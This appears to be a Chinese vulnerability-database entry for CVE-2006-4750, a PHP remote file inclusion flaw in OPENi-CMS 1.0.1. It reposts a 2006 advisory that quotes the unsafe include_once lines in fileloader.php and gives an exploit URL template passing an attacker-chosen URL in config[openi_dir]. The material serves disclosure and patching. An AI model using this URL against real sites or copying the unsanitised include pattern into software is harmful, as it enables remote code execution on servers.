OPENi-CMS 'fileloader.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111000 漏洞类型 输入验证
发布时间 2006-09-11 更新时间 2006-09-18
CVE编号 CVE-2006-4750 CNNVD-ID CNNVD-200609-237
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/2344
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-237
|漏洞详情
OPENi-CMS1.0.1及可能的更早版本的openi-admin/base/fileloader.php中存在PHP远程文件包含漏洞,远程攻击者可以通过config[openi_dir]参数中的URL执行任意PHP代码。
|漏洞EXP
Update:
22:44 09/11/06

Subject:
"OPENi-CMS 1.0.1(config) Remote File Inclusion Vulnerability "

Vulnerable version:
OPENi-CMS 1.0.1

Operating System:
- All OS

Vendor URL:
Support - support@openi-cms.org
Website - http://www.openi-cms.org/

Description:
Openi-CMS he one software PHP Content Management System with facilities 
wysiwyg the editor, plugin, user management to facilitate arranged as 
well as the difference style website 


Vulnerability:
Invalid include function at fileloader.php on line at 5,6 and 7,the 
'$config["openi_dir"]' is not gurantee to including a files. 

// openi-admin/base/fileloader.php

include_once($config["openi_dir"]."/base/constants.php"); // invalid code
include_once($config["openi_dir"]."/base/db_classes.php"); // invalid code
include_once($config["openi_dir"]."/base/site_classes.php"); // invalid code

Exploit:
http://[url]/[path]/openi-admin/base/fileloader.php?config[openi_dir]=[url_inclusion_exploit]

Solution:
upgrade next version

Published by:
basher13 (Infam0us Gr0up - Securiti Research)
basher13@linuxmail.org / www.xcrime-cyber.pro.tc

# milw0rm.com [2006-09-11]
|参考资料

来源:XF
名称:openicms-fileloader-file-include(28859)
链接:http://xforce.iss.net/xforce/xfdb/28859
来源:BID
名称:19952
链接:http://www.securityfocus.com/bid/19952
来源:MILW0RM
名称:2344
链接:http://www.milw0rm.com/exploits/2344
来源:VUPEN
名称:ADV-2006-3556
链接:http://www.frsirt.com/english/advisories/2006/3556
来源:SECUNIA
名称:21874
链接:http://secunia.com/advisories/21874
来源:MISC
链接:http://bb.domaindlx.com/bingung/shellcore/advisories.asp?bug_report=display&infamous_group=103
来源:MILW0RM
名称:2344
链接:http://milw0rm.com/exploits/2344